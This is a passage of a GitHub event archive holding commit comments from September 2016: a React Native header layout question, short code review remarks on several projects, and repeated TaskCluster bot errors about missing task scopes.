<https://github.com/notifications/unsubscribe-auth/AFA8tJHh1rPuad0x1S2R5DB4t24etoG4ks5qt9XGgaJpZM4KGlo_>\n> .\n>\n"}},"created_at":"2016-09-26T15:56:37Z"}
{"id":"4618713140","type":"CommitCommentEvent","actor":{"login":"bd-arc"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19174812,"position":null,"line":null,"path":null,"commit_id":"38979f9c68bd054aca3c6102635b2005914506b1","created_at":"2016-09-26T15:57:20Z","updated_at":"2016-09-26T15:57:20Z","body":"@satya164 Thank you for your very quick answer! Unfortunately, the solution you're suggesting doesn't work.\r\n\r\nOn both Android and iOS, it generates an empty space that cannot be filled at all. Even though the scene is absolutely positioned, the header somehow seems to prevent anything from being rendered beneath it.\r\n\r\nMy CardStack component:\r\n```javascript\r\n<CardStack\r\n  navigationState={this.props.navStack}\r\n  onNavigateBack={this._onNavigateBack}\r\n  enableGestures={true}\r\n  renderScene={this._renderScene}\r\n  renderHeader={this._renderHeader}\r\n  style={styles.container}\r\n  direction={this._animation}\r\n/>\r\n```\r\n\r\nMy scene:\r\n```javascript\r\n<View style={{position: 'absolute', top: 0, left: 0, bottom: 0, right: 0}}>\r\n    { this._renderStatusBar(sceneProps) }\r\n    <Scene {...props} />\r\n</View>\r\n````\r\n\r\nMy header:\r\n```javascript\r\n<Header\r\n  {...this.props}\r\n  style={{backgroundColor: 'transparent', elevation: 0}}\r\n  renderTitleComponent={this._renderTitleComponent}\r\n  renderLeftComponent={this._renderLeftComponent}\r\n  renderRightComponent={this._renderRightComponent}\r\n/>\r\n```\r\n\r\nThe result:\r\n![Issue with transparent header](http://i.imgur.com/0Gze2P5l.png)\r\n\r\nFor the sake of completeness, I've also tried `position: 'absolute'` on the header. While this works on iOS, the header remains invisible on Android despite adding `zIndex` and/or `elevation`...\r\n\r\nAny enlightenment would be really appreciated!"}},"created_at":"2016-09-26T15:57:20Z"}
{"id":"4618722931","type":"CommitCommentEvent","actor":{"login":"perim"},"repo":{"name":"vlj/warzone2100"},"payload":{"comment":{"id":19174843,"position":207,"line":447,"path":"lib/ivis_opengl/piestate.cpp","commit_id":"953305522c28fa03a521f1c9d3fc0a2e31dabdef","created_at":"2016-09-26T15:58:58Z","updated_at":"2016-09-26T15:58:58Z","body":"This always evaluates to true, singe locations is unsigned."}},"created_at":"2016-09-26T15:58:58Z"}
{"id":"4618724322","type":"CommitCommentEvent","actor":{"login":"jlandon"},"repo":{"name":"ovenbits/ModelRocket"},"payload":{"comment":{"id":19174848,"position":8,"line":31,"path":"Sources/JSONTransformable.swift","commit_id":"a238a56d1ea5b24db7d573d2a4382a8890f01165","created_at":"2016-09-26T15:59:10Z","updated_at":"2016-09-26T15:59:10Z","body":"Sorry, that \"?\" was meant to be outside the code block, so non-optional. 🙂 If you return `Self` (non-optional), does that fix things?"}},"created_at":"2016-09-26T15:59:10Z"}
{"id":"4618728103","type":"CommitCommentEvent","actor":{"login":"FlatOutPS2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19174853,"position":null,"line":null,"path":null,"commit_id":"be9995bd1e1190321969c89e2bbc5914a19a8f41","created_at":"2016-09-26T15:59:46Z","updated_at":"2016-09-26T15:59:46Z","body":"R&C 1 demo is spamming `Invalid mipmap layer` on the Metropolis level. It stops a short while into the game and does not return, not even when dying and returning to the beginning of the level , only loading the same level again reproduces it. The other level of the demo does not have the issue."}},"created_at":"2016-09-26T15:59:46Z"}
{"id":"4618731587","type":"CommitCommentEvent","actor":{"login":"SarthakNarang"},"repo":{"name":"SarthakNarang/Local_Manifest"},"payload":{"comment":{"id":19174860,"position":null,"line":null,"path":null,"commit_id":"a6ac22a606f9f733c8d10554baffd30874ea4c83","created_at":"2016-09-26T16:00:17Z","updated_at":"2016-09-26T16:00:17Z","body":"@Ordenkrieger No, that was just for picking some commits for personal exp, all roms already have this so no need :)"}},"created_at":"2016-09-26T16:00:17Z"}
{"id":"4618735821","type":"CommitCommentEvent","actor":{"login":"kreeger"},"repo":{"name":"ovenbits/ModelRocket"},"payload":{"comment":{"id":19174868,"position":8,"line":31,"path":"Sources/JSONTransformable.swift","commit_id":"a238a56d1ea5b24db7d573d2a4382a8890f01165","created_at":"2016-09-26T16:00:56Z","updated_at":"2016-09-26T16:00:56Z","body":"@jlandon Sadly, nope! The error message is the same as :point_up_2:, except it expects the return type to be `Self` instead of `Self?`."}},"created_at":"2016-09-26T16:00:56Z"}
{"id":"4618737773","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"TaskClusterRobot/hooks-testing"},"payload":{"comment":{"id":19174873,"position":null,"line":null,"path":null,"commit_id":"af82e8c416b8d8c3744dcba2790b5e59a3e796f1","created_at":"2016-09-26T16:01:14Z","updated_at":"2016-09-26T16:01:14Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\",\\n    \\\"queue:route:notify.irc-user.bstack.on-any\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/TaskClusterRobot/hooks-testing:branch:imbstack-patch-1\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-user.bstack.on-any\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"fKXZosteSdqXrQQLHZ5cAg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.bstack@mozilla.com.on-any\\\",\\n    \\\"notify.irc-user.bstack.on-any\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"image\\\": \\\"node:5\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-lc\\\",\\n      \\\"echo 'This works!'\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"imbstack-patch-1\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"0000000000000000000000000000000000000000\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"imbstack-patch-1\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/TaskClusterRobot/hooks-testing.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"imbstack\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"af82e8c416b8d8c3744dcba2790b5e59a3e796f1\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"imbstack-patch-1\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bstack@mozilla.com\\\"\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"TaskCluster GitHub Tests\\\",\\n    \\\"description\\\": \\\"Tests for taskcluster github in production\\\",\\n    \\\"owner\\\": \\\"bstack@mozilla.com\\\",\\n    \\\"source\\\": \\\"https://github.com/TaskClusterRobot/hooks-testing.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-26T16:01:14.286Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-27T16:01:14.287Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"UT-YqfrTQN69bhLmVSPxbA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-27T16:01:14.287Z\\\"\\n}\\n  time:     2016-09-26T16:01:14.524Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\",\\n      \\\"queue:route:notify.irc-user.bstack.on-any\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/TaskClusterRobot/hooks-testing:branch:imbstack-patch-1\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\",\\n    \\\"queue:route:notify.irc-user.bstack.on-any\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/TaskClusterRobot/hooks-testing:branch:imbstack-patch-1\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-user.bstack.on-any\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"fKXZosteSdqXrQQLHZ5cAg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.bstack@mozilla.com.on-any\\\",\\n    \\\"notify.irc-user.bstack.on-any\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"image\\\": \\\"node:5\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-lc\\\",\\n      \\\"echo 'This works!'\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"imbstack-patch-1\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"0000000000000000000000000000000000000000\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"imbstack-patch-1\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/TaskClusterRobot/hooks-testing.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"imbstack\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"af82e8c416b8d8c3744dcba2790b5e59a3e796f1\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"imbstack-patch-1\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bstack@mozilla.com\\\"\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"TaskCluster GitHub Tests\\\",\\n    \\\"description\\\": \\\"Tests for taskcluster github in production\\\",\\n    \\\"owner\\\": \\\"bstack@mozilla.com\\\",\\n    \\\"source\\\": \\\"https://github.com/TaskClusterRobot/hooks-testing.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-26T16:01:14.286Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-27T16:01:14.287Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"UT-YqfrTQN69bhLmVSPxbA\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-27T16:01:14.287Z\\\"\\n}\\n  time:     2016-09-26T16:01:14.524Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\",\\n      \\\"queue:route:notify.irc-user.bstack.on-any\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/TaskClusterRobot/hooks-testing:branch:imbstack-patch-1\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"fKXZosteSdqXrQQLHZ5cAg\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.bstack@mozilla.com.on-any\",\n                        \"notify.irc-user.bstack.on-any\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"image\": \"node:5\",\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-lc\",\n                            \"echo 'This works!'\"\n                        ],\n                        \"env\": {\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"imbstack-patch-1\",\n                            \"GITHUB_BASE_SHA\": \"0000000000000000000000000000000000000000\",\n                            \"GITHUB_BASE_BRANCH\": \"imbstack-patch-1\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/TaskClusterRobot/hooks-testing.git\",\n                            \"GITHUB_HEAD_USER\": \"imbstack\",\n                            \"GITHUB_HEAD_SHA\": \"af82e8c416b8d8c3744dcba2790b5e59a3e796f1\",\n                            \"GITHUB_HEAD_BRANCH\": \"imbstack-patch-1\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bstack@mozilla.com\"\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"TaskCluster GitHub Tests\",\n                        \"description\": \"Tests for taskcluster github in production\",\n                        \"owner\": \"bstack@mozilla.com\",\n                        \"source\": \"https://github.com/TaskClusterRobot/hooks-testing.git\"\n                    },\n                    \"created\": \"2016-09-26T16:01:14.286Z\",\n                    \"deadline\": \"2016-09-27T16:01:14.287Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"UT-YqfrTQN69bhLmVSPxbA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-27T16:01:14.287Z\"\n                },\n                \"time\": \"2016-09-26T16:01:14.524Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.bstack@mozilla.com.on-any\",\n                        \"queue:route:notify.irc-user.bstack.on-any\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/TaskClusterRobot/hooks-testing:branch:imbstack-patch-1\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-26T16:01:14Z"}
{"id":"4618739025","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"TaskClusterRobot/hooks-testing"},"payload":{"comment":{"id":19174878,"position":null,"line":null,"path":null,"commit_id":"af82e8c416b8d8c3744dcba2790b5e59a3e796f1","created_at":"2016-09-26T16:01:26Z","updated_at":"2016-09-26T16:01:26Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\",\\n    \\\"queue:route:notify.irc-user.bstack.on-any\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/TaskClusterRobot/hooks-testing:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-user.bstack.on-any\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"CjbJGVwoSMCV2ltEiSwBtw\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.bstack@mozilla.com.on-any\\\",\\n    \\\"notify.irc-user.bstack.on-any\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"image\\\": \\\"node:5\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-lc\\\",\\n      \\\"echo 'This works!'\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 3,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/TaskClusterRobot/hooks-testing.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"TaskClusterRobot\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"795f050fcd34a255d50a847c1a6f40eeafb37c42\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/TaskClusterRobot/hooks-testing.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"TaskClusterRobot\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"af82e8c416b8d8c3744dcba2790b5e59a3e796f1\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"imbstack-patch-1\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"TaskClusterRobot@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"TaskCluster GitHub Tests\\\",\\n    \\\"description\\\": \\\"Tests for taskcluster github in production\\\",\\n    \\\"owner\\\": \\\"TaskClusterRobot@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/TaskClusterRobot/hooks-testing.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-26T16:01:26.375Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-27T16:01:26.384Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"GkYc9j1KTJ6O9P9jm0sFyQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-27T16:01:26.384Z\\\"\\n}\\n  time:     2016-09-26T16:01:26.529Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\",\\n      \\\"queue:route:notify.irc-user.bstack.on-any\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/TaskClusterRobot/hooks-testing:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\",\\n    \\\"queue:route:notify.irc-user.bstack.on-any\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/TaskClusterRobot/hooks-testing:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-user.bstack.on-any\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"CjbJGVwoSMCV2ltEiSwBtw\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.bstack@mozilla.com.on-any\\\",\\n    \\\"notify.irc-user.bstack.on-any\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"image\\\": \\\"node:5\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-lc\\\",\\n      \\\"echo 'This works!'\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 3,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/TaskClusterRobot/hooks-testing.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"TaskClusterRobot\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"795f050fcd34a255d50a847c1a6f40eeafb37c42\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/TaskClusterRobot/hooks-testing.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"TaskClusterRobot\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"af82e8c416b8d8c3744dcba2790b5e59a3e796f1\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"imbstack-patch-1\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"TaskClusterRobot@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"TaskCluster GitHub Tests\\\",\\n    \\\"description\\\": \\\"Tests for taskcluster github in production\\\",\\n    \\\"owner\\\": \\\"TaskClusterRobot@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/TaskClusterRobot/hooks-testing.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-26T16:01:26.375Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-27T16:01:26.384Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"GkYc9j1KTJ6O9P9jm0sFyQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-27T16:01:26.384Z\\\"\\n}\\n  time:     2016-09-26T16:01:26.529Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.bstack@mozilla.com.on-any\\\",\\n      \\\"queue:route:notify.irc-user.bstack.on-any\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/TaskClusterRobot/hooks-testing:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"CjbJGVwoSMCV2ltEiSwBtw\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.bstack@mozilla.com.on-any\",\n                        \"notify.irc-user.bstack.on-any\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"image\": \"node:5\",\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-lc\",\n                            \"echo 'This works!'\"\n                        ],\n                        \"env\": {\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 3,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/TaskClusterRobot/hooks-testing.git\",\n                            \"GITHUB_BASE_USER\": \"TaskClusterRobot\",\n                            \"GITHUB_BASE_SHA\": \"795f050fcd34a255d50a847c1a6f40eeafb37c42\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/TaskClusterRobot/hooks-testing.git\",\n                            \"GITHUB_HEAD_USER\": \"TaskClusterRobot\",\n                            \"GITHUB_HEAD_SHA\": \"af82e8c416b8d8c3744dcba2790b5e59a3e796f1\",\n                            \"GITHUB_HEAD_BRANCH\": \"imbstack-patch-1\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"TaskClusterRobot@noreply.github.com\"\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"TaskCluster GitHub Tests\",\n                        \"description\": \"Tests for taskcluster github in production\",\n                        \"owner\": \"TaskClusterRobot@noreply.github.com\",\n                        \"source\": \"https://github.com/TaskClusterRobot/hooks-testing.git\"\n                    },\n                    \"created\": \"2016-09-26T16:01:26.375Z\",\n                    \"deadline\": \"2016-09-27T16:01:26.384Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"GkYc9j1KTJ6O9P9jm0sFyQ\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-27T16:01:26.384Z\"\n                },\n                \"time\": \"2016-09-26T16:01:26.529Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.bstack@mozilla.com.on-any\",\n                        \"queue:route:notify.irc-user.bstack.on-any\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/TaskClusterRobot/hooks-testing:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-26T16:01:26Z"}
